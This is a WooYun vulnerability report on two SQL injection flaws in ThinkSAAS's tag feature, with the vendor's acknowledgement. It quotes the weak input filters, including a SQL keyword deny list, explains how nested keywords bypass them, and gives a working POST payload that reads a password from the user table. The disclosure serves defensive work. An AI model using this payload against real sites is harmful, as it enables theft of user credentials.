当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-053384

漏洞标题:ThinkSAAS最新版绕过过滤继续注入2处

相关厂商:thinksaas.cn

漏洞作者: xfkxfk

提交时间:2014-03-11 23:13

修复时间:2014-06-09 23:13

公开时间:2014-06-09 23:13

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-11: 细节已通知厂商并且等待厂商处理中
2014-03-12: 厂商已经确认,细节仅向厂商公开
2014-03-15: 细节向第三方安全合作伙伴开放
2014-05-06: 细节向核心白帽子及相关领域专家公开
2014-05-16: 细节向普通白帽子公开
2014-05-26: 细节向实习白帽子公开
2014-06-09: 细节向公众公开

简要描述:

ThinkSAAS最新版绕过过滤继续注入2处
无视gpc,无需登录

详细说明:

之前这个漏洞有 ′ 雨。分析过: WooYun: Thinksaas某处绕过过滤的注射漏洞
现在官方有最新版,做了修改,加了过滤,但是过滤不严格,可以绕过继续注入。
第一处:
现在最新的代码/app/tag/action/add_ajax.php

case "do":
	
		$objname = t($_POST['objname']);
		$idname = tsFilter(t($_POST['idname']));
		$objid = t($_POST['objid']);
		$tags = t($_POST['tags']);
		
		$new['tag']->addTag($objname,$idname,$objid,$tags);
		
		echo "<script language=JavaScript>parent.window.location.reload();</script>";
	
		break;


在原来的$idname = t($_POST['idname']);基础上加了过滤函数tsFilter
这里进行了双层过滤,t过滤了很多字符,而tsFilter过滤注入关键字。

function t($text) {
	$text = preg_replace ( '/\[.*?\]/is', '', $text );
	$text = cleanJs ( $text );
	// 彻底过滤空格BY QINIAO
	$text = preg_replace ( '/\s(?=\s)/', '', $text );
	$text = preg_replace ( '/[\n\r\t]/', ' ', $text );
	$text = str_replace ( '  ', ' ', $text );
	// $text = str_replace ( ' ', '', $text );
	$text = str_replace ( '&nbsp;', '', $text );
	$text = str_replace ( '&', '', $text );
	$text = str_replace ( '=', '', $text );
	$text = str_replace ( '-', '', $text );
	$text = str_replace ( '#', '', $text );
	$text = str_replace ( '%', '', $text );
	$text = str_replace ( '!', '', $text );
	$text = str_replace ( '@', '', $text );
	$text = str_replace ( '^', '', $text );
	$text = str_replace ( '*', '', $text );
	$text = str_replace ( 'amp;', '', $text );
	
	$text = str_replace ( 'position', '', $text );
	
	$text = strip_tags ( $text );
	$text = htmlspecialchars ( $text );
	$text = str_replace ( "'", "", $text );
	return $text;
}


过滤字符的。

function tsFilter($value){
	$value = trim($value);
	//定义不允许提交的SQl命令和关键字
	$words = array();
	$words[] = "add ";
	$words[] = "and ";
	$words[] = "count ";
	$words[] = "order ";
	$words[] = "table ";
	$words[] = "by ";
	$words[] = "create ";
	$words[] = "delete ";
	$words[] = "drop ";
	$words[] = "from ";
	$words[] = "grant ";
	$words[] = "insert ";
	$words[] = "select ";
	$words[] = "truncate ";
	$words[] = "update ";
	$words[] = "use ";
	$words[] = "--";
	$words[] = "#";
	$words[] = "group_concat";
	$words[] = "column_name";
	$words[] = "information_schema.columns";
	$words[] = "table_schema";
	$words[] = "union ";
	$words[] = "where ";
	$words[] = "alert";
	$value = strtolower($value);//转换为小写
	foreach($words as $word){
		if(strstr($value,$word)){
			$value = str_replace($word,'',$value);
		}
	}
	
	return $value;
}


过滤注入关键字。
通过t函数我们可以不用这里面的这些字符就是了。
而tsFilter我们可以将“select”改为“selselect ect”,就可以绕过过滤。
下面来看看addTag函数进行添加标签处理的:

function addTag($objname,$idname,$objid,$tags){
	  		......
$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
							$idname=>$objid,
							'tagid'=>$tagid,
						));


在这里$idname 做了key,带入findCount函数。

public function findCount($table, $conditions = null) {
		$where = "";
		if (is_array ( $conditions )) {
			$join = array ();
			foreach ( $conditions as $key => $condition ) {
				$condition = $this->escape ( $condition );
				$join [] = "{$key} = {$condition}";
			}
			$where = "WHERE " . join ( " AND ", $join );
		} else {
			if (null != $conditions)
				$where = "WHERE " . $conditions;
		}
		$sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}";
		$result = $this->db->once_fetch_assoc ( $sql );
		
		return $result ['ts_counter'];
	}


这里只是对value做了过滤,但是key没有过滤。
通过上面的绕过过滤,以及下面的分析,可以直接注入了。
第二处注入在add.php文件

case "do":
	
		$objname = tsFilter($_POST['objname']);
		$idname = tsFilter($_POST['idname']);
		$objid = intval($_POST['objid']);
		$tags = t($_POST['tags']);
		
		$new['tag']->addTag($objname,$idname,$objid,$tags);
		
		tsNotice('标签添加成功!');
	
		break;


同样是进行addtag,但是这里没有t函数,只有一个tsFilter函数进行过滤,注入起来更容易了。
其他跟上面第一处注入是过程一样的。

漏洞证明:

发送请求:
链接:http://localhost/thinksaas/index.php?app=tag&ac=add_ajax&ts=do
POST:objid=111111&objname=article&idname=111 uniunion on seleselect ct pwd frfrom om ts_user limit 1,1;a&tags=idname

11.png


22.png

修复方案:

严格过滤

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-03-12 13:57

厂商回复:

感谢提交,正在修复...

最新状态:

暂无